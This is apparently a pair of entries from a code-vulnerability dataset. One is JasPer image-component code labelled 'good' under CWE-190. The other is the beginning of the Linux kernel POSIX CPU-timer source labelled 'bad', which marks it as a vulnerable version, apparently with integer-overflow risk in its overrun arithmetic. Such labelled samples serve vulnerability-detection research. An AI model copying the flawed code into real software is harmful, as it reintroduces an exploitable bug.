int jas_image_readcmpt2(jas_image_t *image, int cmptno, jas_image_coord_t x,
jas_image_coord_t y, jas_image_coord_t width, jas_image_coord_t height,
long *buf)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
long v;
long *bufptr;
if (cmptno < 0 || cmptno >= image->numcmpts_)
goto error;
cmpt = image->cmpts_[cmptno];
if (x < 0 || x >= cmpt->width_ || y < 0 || y >= cmpt->height_ ||
width < 0 || height < 0 || x + width > cmpt->width_ ||
y + height > cmpt->height_)
goto error;
bufptr = buf;
for (i = 0; i < height; ++i) {
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0)
goto error;
for (j = 0; j < width; ++j) {
if (getint(cmpt->stream_, cmpt->sgnd_, cmpt->prec_, &v))
goto error;
*bufptr++ = v;
}
}
return 0;
error:
return -1;
}
int jas_image_writecmpt2(jas_image_t *image, int cmptno, jas_image_coord_t x,
jas_image_coord_t y, jas_image_coord_t width, jas_image_coord_t height,
long *buf)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
long v;
long *bufptr;
if (cmptno < 0 || cmptno >= image->numcmpts_)
goto error;
cmpt = image->cmpts_[cmptno];
if (x < 0 || x >= cmpt->width_ || y < 0 || y >= cmpt->height_ ||
width < 0 || height < 0 || x + width > cmpt->width_ ||
y + height > cmpt->height_)
goto error;
bufptr = buf;
for (i = 0; i < height; ++i) {
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0)
goto error;
for (j = 0; j < width; ++j) {
v = *bufptr++;
if (putint(cmpt->stream_, cmpt->sgnd_, cmpt->prec_, v))
goto error;
}
}
return 0;
error:
return -1;
}
int jas_image_sampcmpt(jas_image_t *image, int cmptno, int newcmptno,
jas_image_coord_t ho, jas_image_coord_t vo, jas_image_coord_t hs,
jas_image_coord_t vs, int sgnd, int prec)
{
jas_image_cmpt_t *oldcmpt;
jas_image_cmpt_t *newcmpt;
int width;
int height;
jas_image_coord_t tlx;
jas_image_coord_t tly;
jas_image_coord_t brx;
jas_image_coord_t bry;
int i;
int j;
jas_image_cmptparm_t cmptparm;
jas_image_coord_t ax;
jas_image_coord_t ay;
jas_image_coord_t bx;
jas_image_coord_t by;
jas_image_coord_t d0;
jas_image_coord_t d1;
jas_image_coord_t d2;
jas_image_coord_t d3;
jas_image_coord_t oldx;
jas_image_coord_t oldy;
jas_image_coord_t x;
jas_image_coord_t y;
long v;
jas_image_coord_t cmptbrx;
jas_image_coord_t cmptbry;
assert(cmptno >= 0 && cmptno < image->numcmpts_);
oldcmpt = image->cmpts_[cmptno];
assert(oldcmpt->tlx_ == 0 && oldcmpt->tly_ == 0);
jas_image_calcbbox2(image, &tlx, &tly, &brx, &bry);
width = FLOORDIV(brx - ho + hs, hs);
height = FLOORDIV(bry - vo + vs, vs);
cmptparm.tlx = ho;
cmptparm.tly = vo;
cmptparm.hstep = hs;
cmptparm.vstep = vs;
cmptparm.width = width;
cmptparm.height = height;
cmptparm.prec = prec;
cmptparm.sgnd = sgnd;
if (jas_image_addcmpt(image, newcmptno, &cmptparm))
goto error;
cmptbrx = oldcmpt->tlx_ + (oldcmpt->width_ - 1) * oldcmpt->hstep_;
cmptbry = oldcmpt->tly_ + (oldcmpt->height_ - 1) * oldcmpt->vstep_;
newcmpt = image->cmpts_[newcmptno];
jas_stream_rewind(newcmpt->stream_);
for (i = 0; i < height; ++i) {
y = newcmpt->tly_ + newcmpt->vstep_ * i;
for (j = 0; j < width; ++j) {
x = newcmpt->tlx_ + newcmpt->hstep_ * j;
ax = downtomult(x - oldcmpt->tlx_, oldcmpt->hstep_) + oldcmpt->tlx_;
ay = downtomult(y - oldcmpt->tly_, oldcmpt->vstep_) + oldcmpt->tly_;
bx = uptomult(x - oldcmpt->tlx_, oldcmpt->hstep_) + oldcmpt->tlx_;
if (bx > cmptbrx)
bx = cmptbrx;
by = uptomult(y - oldcmpt->tly_, oldcmpt->vstep_) + oldcmpt->tly_;
if (by > cmptbry)
by = cmptbry;
d0 = (ax - x) * (ax - x) + (ay - y) * (ay - y);
d1 = (bx - x) * (bx - x) + (ay - y) * (ay - y);
d2 = (bx - x) * (bx - x) + (by - y) * (by - y);
d3 = (ax - x) * (ax - x) + (by - y) * (by - y);
if (d0 <= d1 && d0 <= d2 && d0 <= d3) {
oldx = (ax - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (ay - oldcmpt->tly_) / oldcmpt->vstep_;
} else if (d1 <= d0 && d1 <= d2 && d1 <= d3) {
oldx = (bx - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (ay - oldcmpt->tly_) / oldcmpt->vstep_;
} else if (d2 <= d0 && d2 <= d1 && d2 <= d3) {
oldx = (bx - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (by - oldcmpt->tly_) / oldcmpt->vstep_;
} else {
oldx = (ax - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (by - oldcmpt->tly_) / oldcmpt->vstep_;
}
assert(oldx >= 0 && oldx < oldcmpt->width_ &&
oldy >= 0 && oldy < oldcmpt->height_);
if (jas_stream_seek(oldcmpt->stream_, oldcmpt->cps_ *
(oldy * oldcmpt->width_ + oldx), SEEK_SET) < 0)
goto error;
if (getint(oldcmpt->stream_, oldcmpt->sgnd_,
oldcmpt->prec_, &v))
goto error;
if (newcmpt->prec_ != oldcmpt->prec_ ||
newcmpt->sgnd_ != oldcmpt->sgnd_) {
v = convert(v, oldcmpt->sgnd_, oldcmpt->prec_,
newcmpt->sgnd_, newcmpt->prec_);
}
if (putint(newcmpt->stream_, newcmpt->sgnd_,
newcmpt->prec_, v))
goto error;
}
}
return 0;
error:
return -1;
}
int jas_image_ishomosamp(jas_image_t *image)
{
jas_image_coord_t hstep;
jas_image_coord_t vstep;
int result;
int i;
hstep = jas_image_cmpthstep(image, 0);
vstep = jas_image_cmptvstep(image, 0);
result = 1;
for (i = 0; i < image->numcmpts_; ++i) {
if (jas_image_cmpthstep(image, i) != hstep ||
jas_image_cmptvstep(image, i) != vstep) {
result = 0;
break;
}
}
return result;
}
/* Note: This function defines the bounding box differently from
   jas_image_setbbox(): the bottom-right corner computed here is the
   coordinate of the last sample, not one past it. */
static void jas_image_calcbbox2(jas_image_t *image, jas_image_coord_t *tlx,
jas_image_coord_t *tly, jas_image_coord_t *brx, jas_image_coord_t *bry)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t tmptlx;
jas_image_coord_t tmptly;
jas_image_coord_t tmpbrx;
jas_image_coord_t tmpbry;
jas_image_coord_t t;
int i;
if (image->numcmpts_ > 0) {
cmpt = image->cmpts_[0];
tmptlx = cmpt->tlx_;
tmptly = cmpt->tly_;
tmpbrx = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1);
tmpbry = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1);
for (i = 0; i < image->numcmpts_; ++i) {
cmpt = image->cmpts_[i];
if (cmpt->tlx_ < tmptlx)
tmptlx = cmpt->tlx_;
if (cmpt->tly_ < tmptly)
tmptly = cmpt->tly_;
t = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1);
if (t > tmpbrx)
tmpbrx = t;
t = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1);
if (t > tmpbry)
tmpbry = t;
}
} else {
tmptlx = 0;
tmptly = 0;
tmpbrx = -1;
tmpbry = -1;
}
*tlx = tmptlx;
*tly = tmptly;
*brx = tmpbrx;
*bry = tmpbry;
}
static inline long decode_twos_comp(ulong c, int prec)
{
long result;
assert(prec >= 2);
jas_eprintf("warning: support for signed data is untested\n");
// NOTE: Is this correct?
result = (c & ((1 << (prec - 1)) - 1)) - (c & (1 << (prec - 1)));
return result;
}
static inline ulong encode_twos_comp(long n, int prec)
{
ulong result;
assert(prec >= 2);
jas_eprintf("warning: support for signed data is untested\n");
// NOTE: Is this correct?
if (n < 0) {
result = -n;
result = (result ^ 0xffffffffUL) + 1;
result &= (1 << prec) - 1;
} else {
result = n;
}
return result;
}
static int getint(jas_stream_t *in, int sgnd, int prec, long *val)
{
long v;
int n;
int c;
assert((!sgnd && prec >= 1) || (sgnd && prec >= 2));
n = (prec + 7) / 8;
v = 0;
while (--n >= 0) {
if ((c = jas_stream_getc(in)) == EOF)
return -1;
v = (v << 8) | c;
}
v &= ((1 << prec) - 1);
if (sgnd) {
*val = decode_twos_comp(v, prec);
} else {
*val = v;
}
return 0;
}
static int putint(jas_stream_t *out, int sgnd, int prec, long val)
{
int n;
int c;
bool s;
ulong tmp;
assert((!sgnd && prec >= 1) || (sgnd && prec >= 2));
if (sgnd) {
val = encode_twos_comp(val, prec);
}
assert(val >= 0);
val &= (1 << prec) - 1;
n = (prec + 7) / 8;
while (--n >= 0) {
c = (val >> (n * 8)) & 0xff;
if (jas_stream_putc(out, c) != c)
return -1;
}
return 0;
}
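/* getint()/putint() above move one sample as (prec + 7) / 8 bytes in
   big-endian order.  For example, with prec == 12 the value 0xabc is written
   as the two bytes 0x0a, 0xbc and read back the same way; signed samples go
   through the two's-complement encode/decode helpers first. */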
static long convert(long val, int oldsgnd, int oldprec, int newsgnd,
int newprec)
{
if (newsgnd != oldsgnd) {
}
if (newprec != oldprec) {
if (newprec > oldprec) {
val <<= newprec - oldprec;
} else if (oldprec > newprec) {
val >>= oldprec - newprec;
}
}
return val;
}
static long downtomult(long x, long y)
{
assert(x >= 0);
return (x / y) * y;
}
static long uptomult(long x, long y)
{
assert(x >= 0);
return ((x + y - 1) / y) * y;
}
jas_image_t *jas_image_chclrspc(jas_image_t *image, jas_cmprof_t *outprof,
int intent)
{
jas_image_t *inimage;
int minhstep;
int minvstep;
int i;
int j;
int k;
int n;
int hstep;
int vstep;
int numinauxchans;
int numoutauxchans;
int numinclrchans;
int numoutclrchans;
int prec;
jas_image_t *outimage;
int cmpttype;
int numoutchans;
jas_cmprof_t *inprof;
jas_cmprof_t *tmpprof;
jas_image_cmptparm_t cmptparm;
int width;
int height;
jas_cmxform_t *xform;
jas_cmpixmap_t inpixmap;
jas_cmpixmap_t outpixmap;
jas_cmcmptfmt_t *incmptfmts;
jas_cmcmptfmt_t *outcmptfmts;
#if 0
jas_eprintf("IMAGE\n");
jas_image_dump(image, stderr);
#endif
outimage = 0;
xform = 0;
if (!(inimage = jas_image_copy(image)))
goto error;
image = 0;
if (!jas_image_ishomosamp(inimage)) {
minhstep = jas_image_cmpthstep(inimage, 0);
minvstep = jas_image_cmptvstep(inimage, 0);
for (i = 1; i < jas_image_numcmpts(inimage); ++i) {
hstep = jas_image_cmpthstep(inimage, i);
vstep = jas_image_cmptvstep(inimage, i);
if (hstep < minhstep) {
minhstep = hstep;
}
if (vstep < minvstep) {
minvstep = vstep;
}
}
n = jas_image_numcmpts(inimage);
for (i = 0; i < n; ++i) {
cmpttype = jas_image_cmpttype(inimage, i);
if (jas_image_sampcmpt(inimage, i, i + 1, 0, 0, minhstep, minvstep,
jas_image_cmptsgnd(inimage, i), jas_image_cmptprec(inimage, i))) {
goto error;
}
jas_image_setcmpttype(inimage, i + 1, cmpttype);
jas_image_delcmpt(inimage, i);
}
}
width = jas_image_cmptwidth(inimage, 0);
height = jas_image_cmptheight(inimage, 0);
hstep = jas_image_cmpthstep(inimage, 0);
vstep = jas_image_cmptvstep(inimage, 0);
if (!(inprof = jas_image_cmprof(inimage))) {
abort();
}
numinclrchans = jas_clrspc_numchans(jas_cmprof_clrspc(inprof));
numinauxchans = jas_image_numcmpts(inimage) - numinclrchans;
numoutclrchans = jas_clrspc_numchans(jas_cmprof_clrspc(outprof));
numoutauxchans = 0;
numoutchans = numoutclrchans + numoutauxchans;
prec = 8;
if (!(outimage = jas_image_create0())) {
goto error;
}
/* Create a component for each of the colorants. */
for (i = 0; i < numoutclrchans; ++i) {
cmptparm.tlx = 0;
cmptparm.tly = 0;
cmptparm.hstep = hstep;
cmptparm.vstep = vstep;
cmptparm.width = width;
cmptparm.height = height;
cmptparm.prec = prec;
cmptparm.sgnd = 0;
if (jas_image_addcmpt(outimage, -1, &cmptparm))
goto error;
jas_image_setcmpttype(outimage, i, JAS_IMAGE_CT_COLOR(i));
}
#if 0
/* Copy the auxiliary components without modification. */
for (i = 0; i < jas_image_numcmpts(inimage); ++i) {
if (!ISCOLOR(jas_image_cmpttype(inimage, i))) {
jas_image_copycmpt(outimage, -1, inimage, i);
/* XXX - need to specify laydown of component on ref. grid */
}
}
#endif
if (!(tmpprof = jas_cmprof_copy(outprof)))
goto error;
assert(!jas_image_cmprof(outimage));
jas_image_setcmprof(outimage, tmpprof);
tmpprof = 0;
jas_image_setclrspc(outimage, jas_cmprof_clrspc(outprof));
if (!(xform = jas_cmxform_create(inprof, outprof, 0, JAS_CMXFORM_OP_FWD,
intent, 0))) {
goto error;
}
inpixmap.numcmpts = numinclrchans;
if (!(incmptfmts = jas_alloc2(numinclrchans, sizeof(jas_cmcmptfmt_t)))) {
abort();
}
inpixmap.cmptfmts = incmptfmts;
for (i = 0; i < numinclrchans; ++i) {
j = jas_image_getcmptbytype(inimage, JAS_IMAGE_CT_COLOR(i));
assert(j >= 0);
if (!(incmptfmts[i].buf = jas_alloc2(width, sizeof(long)))) {
goto error;
}
incmptfmts[i].prec = jas_image_cmptprec(inimage, j);
incmptfmts[i].sgnd = jas_image_cmptsgnd(inimage, j);
incmptfmts[i].width = width;
incmptfmts[i].height = 1;
}
outpixmap.numcmpts = numoutclrchans;
if (!(outcmptfmts = jas_alloc2(numoutclrchans, sizeof(jas_cmcmptfmt_t)))) {
abort();
}
outpixmap.cmptfmts = outcmptfmts;
for (i = 0; i < numoutclrchans; ++i) {
j = jas_image_getcmptbytype(outimage, JAS_IMAGE_CT_COLOR(i));
assert(j >= 0);
if (!(outcmptfmts[i].buf = jas_alloc2(width, sizeof(long))))
goto error;
outcmptfmts[i].prec = jas_image_cmptprec(outimage, j);
outcmptfmts[i].sgnd = jas_image_cmptsgnd(outimage, j);
outcmptfmts[i].width = width;
outcmptfmts[i].height = 1;
}
for (i = 0; i < height; ++i) {
for (j = 0; j < numinclrchans; ++j) {
k = jas_image_getcmptbytype(inimage, JAS_IMAGE_CT_COLOR(j));
if (jas_image_readcmpt2(inimage, k, 0, i, width, 1,
incmptfmts[j].buf))
goto error;
}
jas_cmxform_apply(xform, &inpixmap, &outpixmap);
for (j = 0; j < numoutclrchans; ++j) {
k = jas_image_getcmptbytype(outimage, JAS_IMAGE_CT_COLOR(j));
if (jas_image_writecmpt2(outimage, k, 0, i, width, 1,
outcmptfmts[j].buf))
goto error;
}
}
for (i = 0; i < numoutclrchans; ++i) {
jas_free(outcmptfmts[i].buf);
}
jas_free(outcmptfmts);
for (i = 0; i < numinclrchans; ++i) {
jas_free(incmptfmts[i].buf);
}
jas_free(incmptfmts);
jas_cmxform_destroy(xform);
jas_image_destroy(inimage);
#if 0
jas_eprintf("INIMAGE\n");
jas_image_dump(inimage, stderr);
jas_eprintf("OUTIMAGE\n");
jas_image_dump(outimage, stderr);
#endif
return outimage;
error:
if (xform)
jas_cmxform_destroy(xform);
if (inimage)
jas_image_destroy(inimage);
if (outimage)
jas_image_destroy(outimage);
return 0;
}
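#if 0
/*
* Minimal usage sketch for jas_image_chclrspc() (illustrative and kept
* disabled; jas_cmprof_createfromclrspc(), jas_cmprof_destroy() and
* JAS_CMXFORM_INTENT_PER are assumed to be available from jas_cm.h):
*/
static jas_image_t *image_to_srgb(jas_image_t *image)
{
jas_cmprof_t *outprof;
jas_image_t *newimage;
if (!(outprof = jas_cmprof_createfromclrspc(JAS_CLRSPC_SRGB)))
return 0;
newimage = jas_image_chclrspc(image, outprof, JAS_CMXFORM_INTENT_PER);
jas_cmprof_destroy(outprof);
return newimage;
}
#endif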
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5400_1 |
crossvul-cpp_data_bad_207_1 | // SPDX-License-Identifier: GPL-2.0
/*
* Implement CPU time clocks for the POSIX clock interface.
*/
#include <linux/sched/signal.h>
#include <linux/sched/cputime.h>
#include <linux/posix-timers.h>
#include <linux/errno.h>
#include <linux/math64.h>
#include <linux/uaccess.h>
#include <linux/kernel_stat.h>
#include <trace/events/timer.h>
#include <linux/tick.h>
#include <linux/workqueue.h>
#include <linux/compat.h>
#include <linux/sched/deadline.h>
#include "posix-timers.h"
static void posix_cpu_timer_rearm(struct k_itimer *timer);
/*
* Called after updating RLIMIT_CPU to run cpu timer and update
* tsk->signal->cputime_expires expiration cache if necessary. Needs
* siglock protection since other code may update expiration cache as
* well.
*/
void update_rlimit_cpu(struct task_struct *task, unsigned long rlim_new)
{
u64 nsecs = rlim_new * NSEC_PER_SEC;
spin_lock_irq(&task->sighand->siglock);
set_process_cpu_timer(task, CPUCLOCK_PROF, &nsecs, NULL);
spin_unlock_irq(&task->sighand->siglock);
}
static int check_clock(const clockid_t which_clock)
{
int error = 0;
struct task_struct *p;
const pid_t pid = CPUCLOCK_PID(which_clock);
if (CPUCLOCK_WHICH(which_clock) >= CPUCLOCK_MAX)
return -EINVAL;
if (pid == 0)
return 0;
rcu_read_lock();
p = find_task_by_vpid(pid);
if (!p || !(CPUCLOCK_PERTHREAD(which_clock) ?
same_thread_group(p, current) : has_group_leader_pid(p))) {
error = -EINVAL;
}
rcu_read_unlock();
return error;
}
/*
* Update expiry time from increment, and increase overrun count,
* given the current clock sample.
*/
static void bump_cpu_timer(struct k_itimer *timer, u64 now)
{
int i;
u64 delta, incr;
if (timer->it.cpu.incr == 0)
return;
if (now < timer->it.cpu.expires)
return;
incr = timer->it.cpu.incr;
delta = now + incr - timer->it.cpu.expires;
/* Don't use (incr*2 < delta), incr*2 might overflow. */
for (i = 0; incr < delta - incr; i++)
incr = incr << 1;
for (; i >= 0; incr >>= 1, i--) {
if (delta < incr)
continue;
timer->it.cpu.expires += incr;
timer->it_overrun += 1 << i;
delta -= incr;
}
}
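/*
* Illustrative walk-through of the doubling loop above (numbers made up):
* with expires = 100, incr = 30 and now = 1000, delta = 930. The first loop
* doubles incr (30, 60, 120, 240, 480) until incr >= delta - incr, leaving
* i = 4. The second loop then subtracts the largest power-of-two multiples of
* the original increment that still fit, advancing expires past "now" in
* O(log(delta/incr)) steps rather than one increment at a time, while adding
* the matching number of periods to it_overrun.
*/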
/**
* task_cputime_zero - Check a task_cputime struct for all zero fields.
*
* @cputime: The struct to compare.
*
* Checks @cputime to see if all fields are zero. Returns true if all fields
* are zero, false if any field is nonzero.
*/
static inline int task_cputime_zero(const struct task_cputime *cputime)
{
if (!cputime->utime && !cputime->stime && !cputime->sum_exec_runtime)
return 1;
return 0;
}
static inline u64 prof_ticks(struct task_struct *p)
{
u64 utime, stime;
task_cputime(p, &utime, &stime);
return utime + stime;
}
static inline u64 virt_ticks(struct task_struct *p)
{
u64 utime, stime;
task_cputime(p, &utime, &stime);
return utime;
}
static int
posix_cpu_clock_getres(const clockid_t which_clock, struct timespec64 *tp)
{
int error = check_clock(which_clock);
if (!error) {
tp->tv_sec = 0;
tp->tv_nsec = ((NSEC_PER_SEC + HZ - 1) / HZ);
if (CPUCLOCK_WHICH(which_clock) == CPUCLOCK_SCHED) {
/*
* If sched_clock is using a cycle counter, we
* don't have any idea of its true resolution
* exported, but it is much more than 1s/HZ.
*/
tp->tv_nsec = 1;
}
}
return error;
}
static int
posix_cpu_clock_set(const clockid_t which_clock, const struct timespec64 *tp)
{
/*
* You can never reset a CPU clock, but we check for other errors
* in the call before failing with EPERM.
*/
int error = check_clock(which_clock);
if (error == 0) {
error = -EPERM;
}
return error;
}
/*
* Sample a per-thread clock for the given task.
*/
static int cpu_clock_sample(const clockid_t which_clock,
struct task_struct *p, u64 *sample)
{
switch (CPUCLOCK_WHICH(which_clock)) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
*sample = prof_ticks(p);
break;
case CPUCLOCK_VIRT:
*sample = virt_ticks(p);
break;
case CPUCLOCK_SCHED:
*sample = task_sched_runtime(p);
break;
}
return 0;
}
/*
* Set cputime to sum_cputime if sum_cputime > cputime. Use cmpxchg
* to avoid race conditions with concurrent updates to cputime.
*/
static inline void __update_gt_cputime(atomic64_t *cputime, u64 sum_cputime)
{
u64 curr_cputime;
retry:
curr_cputime = atomic64_read(cputime);
if (sum_cputime > curr_cputime) {
if (atomic64_cmpxchg(cputime, curr_cputime, sum_cputime) != curr_cputime)
goto retry;
}
}
static void update_gt_cputime(struct task_cputime_atomic *cputime_atomic, struct task_cputime *sum)
{
__update_gt_cputime(&cputime_atomic->utime, sum->utime);
__update_gt_cputime(&cputime_atomic->stime, sum->stime);
__update_gt_cputime(&cputime_atomic->sum_exec_runtime, sum->sum_exec_runtime);
}
/* Sample task_cputime_atomic values in "atomic_timers", store results in "times". */
static inline void sample_cputime_atomic(struct task_cputime *times,
struct task_cputime_atomic *atomic_times)
{
times->utime = atomic64_read(&atomic_times->utime);
times->stime = atomic64_read(&atomic_times->stime);
times->sum_exec_runtime = atomic64_read(&atomic_times->sum_exec_runtime);
}
void thread_group_cputimer(struct task_struct *tsk, struct task_cputime *times)
{
struct thread_group_cputimer *cputimer = &tsk->signal->cputimer;
struct task_cputime sum;
/* Check if cputimer isn't running. This is accessed without locking. */
if (!READ_ONCE(cputimer->running)) {
/*
* The POSIX timer interface allows for absolute time expiry
* values through the TIMER_ABSTIME flag, therefore we have
* to synchronize the timer to the clock every time we start it.
*/
thread_group_cputime(tsk, &sum);
update_gt_cputime(&cputimer->cputime_atomic, &sum);
/*
* We're setting cputimer->running without a lock. Ensure
* this only gets written to in one operation. We set
* running after update_gt_cputime() as a small optimization,
* but barriers are not required because update_gt_cputime()
* can handle concurrent updates.
*/
WRITE_ONCE(cputimer->running, true);
}
sample_cputime_atomic(times, &cputimer->cputime_atomic);
}
/*
* Sample a process (thread group) clock for the given group_leader task.
* Must be called with task sighand lock held for safe while_each_thread()
* traversal.
*/
static int cpu_clock_sample_group(const clockid_t which_clock,
struct task_struct *p,
u64 *sample)
{
struct task_cputime cputime;
switch (CPUCLOCK_WHICH(which_clock)) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
thread_group_cputime(p, &cputime);
*sample = cputime.utime + cputime.stime;
break;
case CPUCLOCK_VIRT:
thread_group_cputime(p, &cputime);
*sample = cputime.utime;
break;
case CPUCLOCK_SCHED:
thread_group_cputime(p, &cputime);
*sample = cputime.sum_exec_runtime;
break;
}
return 0;
}
static int posix_cpu_clock_get_task(struct task_struct *tsk,
const clockid_t which_clock,
struct timespec64 *tp)
{
int err = -EINVAL;
u64 rtn;
if (CPUCLOCK_PERTHREAD(which_clock)) {
if (same_thread_group(tsk, current))
err = cpu_clock_sample(which_clock, tsk, &rtn);
} else {
if (tsk == current || thread_group_leader(tsk))
err = cpu_clock_sample_group(which_clock, tsk, &rtn);
}
if (!err)
*tp = ns_to_timespec64(rtn);
return err;
}
static int posix_cpu_clock_get(const clockid_t which_clock, struct timespec64 *tp)
{
const pid_t pid = CPUCLOCK_PID(which_clock);
int err = -EINVAL;
if (pid == 0) {
/*
* Special case constant value for our own clocks.
* We don't have to do any lookup to find ourselves.
*/
err = posix_cpu_clock_get_task(current, which_clock, tp);
} else {
/*
* Find the given PID, and validate that the caller
* should be able to see it.
*/
struct task_struct *p;
rcu_read_lock();
p = find_task_by_vpid(pid);
if (p)
err = posix_cpu_clock_get_task(p, which_clock, tp);
rcu_read_unlock();
}
return err;
}
/*
* Validate the clockid_t for a new CPU-clock timer, and initialize the timer.
* This is called from sys_timer_create() and do_cpu_nanosleep() with the
* new timer already all-zeros initialized.
*/
static int posix_cpu_timer_create(struct k_itimer *new_timer)
{
int ret = 0;
const pid_t pid = CPUCLOCK_PID(new_timer->it_clock);
struct task_struct *p;
if (CPUCLOCK_WHICH(new_timer->it_clock) >= CPUCLOCK_MAX)
return -EINVAL;
new_timer->kclock = &clock_posix_cpu;
INIT_LIST_HEAD(&new_timer->it.cpu.entry);
rcu_read_lock();
if (CPUCLOCK_PERTHREAD(new_timer->it_clock)) {
if (pid == 0) {
p = current;
} else {
p = find_task_by_vpid(pid);
if (p && !same_thread_group(p, current))
p = NULL;
}
} else {
if (pid == 0) {
p = current->group_leader;
} else {
p = find_task_by_vpid(pid);
if (p && !has_group_leader_pid(p))
p = NULL;
}
}
new_timer->it.cpu.task = p;
if (p) {
get_task_struct(p);
} else {
ret = -EINVAL;
}
rcu_read_unlock();
return ret;
}
/*
* Clean up a CPU-clock timer that is about to be destroyed.
* This is called from timer deletion with the timer already locked.
* If we return TIMER_RETRY, it's necessary to release the timer's lock
* and try again. (This happens when the timer is in the middle of firing.)
*/
static int posix_cpu_timer_del(struct k_itimer *timer)
{
int ret = 0;
unsigned long flags;
struct sighand_struct *sighand;
struct task_struct *p = timer->it.cpu.task;
WARN_ON_ONCE(p == NULL);
/*
* Protect against sighand release/switch in exit/exec and process/
* thread timer list entry concurrent read/writes.
*/
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
/*
* We raced with the reaping of the task.
* The deletion should have cleared us off the list.
*/
WARN_ON_ONCE(!list_empty(&timer->it.cpu.entry));
} else {
if (timer->it.cpu.firing)
ret = TIMER_RETRY;
else
list_del(&timer->it.cpu.entry);
unlock_task_sighand(p, &flags);
}
if (!ret)
put_task_struct(p);
return ret;
}
static void cleanup_timers_list(struct list_head *head)
{
struct cpu_timer_list *timer, *next;
list_for_each_entry_safe(timer, next, head, entry)
list_del_init(&timer->entry);
}
/*
* Clean out CPU timers still ticking when a thread exited. The task
* pointer is cleared, and the expiry time is replaced with the residual
* time for later timer_gettime calls to return.
* This must be called with the siglock held.
*/
static void cleanup_timers(struct list_head *head)
{
cleanup_timers_list(head);
cleanup_timers_list(++head);
cleanup_timers_list(++head);
}
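/*
* Note on the ++head arithmetic above: tsk->cpu_timers and
* tsk->signal->cpu_timers are arrays of three list heads (one each for
* CPUCLOCK_PROF, CPUCLOCK_VIRT and CPUCLOCK_SCHED), so the three calls walk
* the lists in that order.
*/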
/*
* These are both called with the siglock held, when the current thread
* is being reaped. When the final (leader) thread in the group is reaped,
* posix_cpu_timers_exit_group will be called after posix_cpu_timers_exit.
*/
void posix_cpu_timers_exit(struct task_struct *tsk)
{
cleanup_timers(tsk->cpu_timers);
}
void posix_cpu_timers_exit_group(struct task_struct *tsk)
{
cleanup_timers(tsk->signal->cpu_timers);
}
static inline int expires_gt(u64 expires, u64 new_exp)
{
return expires == 0 || expires > new_exp;
}
/*
* Insert the timer on the appropriate list before any timers that
* expire later. This must be called with the sighand lock held.
*/
static void arm_timer(struct k_itimer *timer)
{
struct task_struct *p = timer->it.cpu.task;
struct list_head *head, *listpos;
struct task_cputime *cputime_expires;
struct cpu_timer_list *const nt = &timer->it.cpu;
struct cpu_timer_list *next;
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
head = p->cpu_timers;
cputime_expires = &p->cputime_expires;
} else {
head = p->signal->cpu_timers;
cputime_expires = &p->signal->cputime_expires;
}
head += CPUCLOCK_WHICH(timer->it_clock);
listpos = head;
list_for_each_entry(next, head, entry) {
if (nt->expires < next->expires)
break;
listpos = &next->entry;
}
list_add(&nt->entry, listpos);
if (listpos == head) {
u64 exp = nt->expires;
/*
* We are the new earliest-expiring POSIX 1.b timer, hence
* need to update expiration cache. Take into account that
* for process timers we share expiration cache with itimers
* and RLIMIT_CPU and for thread timers with RLIMIT_RTTIME.
*/
switch (CPUCLOCK_WHICH(timer->it_clock)) {
case CPUCLOCK_PROF:
if (expires_gt(cputime_expires->prof_exp, exp))
cputime_expires->prof_exp = exp;
break;
case CPUCLOCK_VIRT:
if (expires_gt(cputime_expires->virt_exp, exp))
cputime_expires->virt_exp = exp;
break;
case CPUCLOCK_SCHED:
if (expires_gt(cputime_expires->sched_exp, exp))
cputime_expires->sched_exp = exp;
break;
}
if (CPUCLOCK_PERTHREAD(timer->it_clock))
tick_dep_set_task(p, TICK_DEP_BIT_POSIX_TIMER);
else
tick_dep_set_signal(p->signal, TICK_DEP_BIT_POSIX_TIMER);
}
}
/*
* The timer is locked, fire it and arrange for its reload.
*/
static void cpu_timer_fire(struct k_itimer *timer)
{
if ((timer->it_sigev_notify & ~SIGEV_THREAD_ID) == SIGEV_NONE) {
/*
* The user doesn't want any signal.
*/
timer->it.cpu.expires = 0;
} else if (unlikely(timer->sigq == NULL)) {
/*
* This is a special case for clock_nanosleep,
* not a normal timer from sys_timer_create.
*/
wake_up_process(timer->it_process);
timer->it.cpu.expires = 0;
} else if (timer->it.cpu.incr == 0) {
/*
* One-shot timer. Clear it as soon as it's fired.
*/
posix_timer_event(timer, 0);
timer->it.cpu.expires = 0;
} else if (posix_timer_event(timer, ++timer->it_requeue_pending)) {
/*
* The signal did not get queued because the signal
* was ignored, so we won't get any callback to
* reload the timer. But we need to keep it
* ticking in case the signal is deliverable next time.
*/
posix_cpu_timer_rearm(timer);
++timer->it_requeue_pending;
}
}
/*
* Sample a process (thread group) timer for the given group_leader task.
* Must be called with task sighand lock held for safe while_each_thread()
* traversal.
*/
static int cpu_timer_sample_group(const clockid_t which_clock,
struct task_struct *p, u64 *sample)
{
struct task_cputime cputime;
thread_group_cputimer(p, &cputime);
switch (CPUCLOCK_WHICH(which_clock)) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
*sample = cputime.utime + cputime.stime;
break;
case CPUCLOCK_VIRT:
*sample = cputime.utime;
break;
case CPUCLOCK_SCHED:
*sample = cputime.sum_exec_runtime;
break;
}
return 0;
}
/*
* Guts of sys_timer_settime for CPU timers.
* This is called with the timer locked and interrupts disabled.
* If we return TIMER_RETRY, it's necessary to release the timer's lock
